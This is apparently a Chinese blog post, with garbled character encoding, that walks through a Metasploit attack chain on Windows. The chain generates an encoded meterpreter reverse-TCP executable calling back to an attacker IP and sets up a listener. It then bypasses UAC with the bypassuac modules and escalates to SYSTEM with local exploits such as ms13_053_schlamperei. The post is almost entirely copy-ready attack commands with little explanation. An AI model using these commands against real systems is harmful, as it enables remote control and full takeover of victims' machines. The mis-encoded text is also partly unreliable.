繞過(guò)UAC提權(quán),利用漏洞提權(quán)

首先建立一個(gè)session,進(jìn)入后滲透測(cè)試階段。

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -b "\x00\xff" -i 7 -f exe -o /root/1.exe? 首先生成一個(gè)meterpreter類(lèi)型的payload

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.80.163

msf exploit(handler) > exploit


繞過(guò)UAC限制

exploit/windows/local/bypassuac 和 exploit/windows/local/bypassuac_injection

什么是UAC(用戶賬戶控制)?,例如:

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp

msf exploit(bypassuac) > set lhost 192.168.80.163

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

meterpreter > getsystem ?繞過(guò)UAC獲取system權(quán)限


利用windows系統(tǒng)漏洞提權(quán)到system

exploit/windows/local/ms13_053_schlamperei

exploit/windows/local/ms13_081_track_popup_menu

exploit/windows/local/ms13_097_ie_registry_symlink

exploit/windows/local/ppr_flatten_rec

msf > use exploit/windows/local/ms13_053_schlamperei

msf exploit(ms13_053_schlamperei) > set session 1

msf exploit(ms13_053_schlamperei) > set payload windows/meterpreter/reverse_tcp

msf exploit(ms13_053_schlamperei) > set lhost 192.168.80.163

msf exploit(ms13_053_schlamperei) > exploit

meterpreter > getsystem ?提權(quán)到system用戶

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 一、MSF終端命令 show exploits 列出metasploit框架中所有的滲透攻擊模塊 show pay...
    Kaen閱讀 3,468評(píng)論 0 1
  • 前言 提權(quán)何須收集各種EXP,一個(gè)MSF就夠了,本文為大家?guī)?lái)MSF綜合提權(quán)的一些姿勢(shì)。 文章內(nèi)容: 學(xué)習(xí)`Met...
    欽玄閱讀 9,253評(píng)論 1 9
  • sqlmap用戶手冊(cè) 說(shuō)明:本文為轉(zhuǎn)載,對(duì)原文中一些明顯的拼寫(xiě)錯(cuò)誤進(jìn)行修正,并標(biāo)注對(duì)自己有用的信息。 ======...
    wind_飄閱讀 2,207評(píng)論 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...
    xuningbo閱讀 10,562評(píng)論 2 22
  • 同人產(chǎn)生摩擦,對(duì)我來(lái)說(shuō),特別是親密相處之人,是致命傷,是一種不能言喻的感觸之痛,我的情緒被無(wú)限放大,昏暗天,寒冷夜...
    程程城閱讀 336評(píng)論 0 0

友情鏈接更多精彩內(nèi)容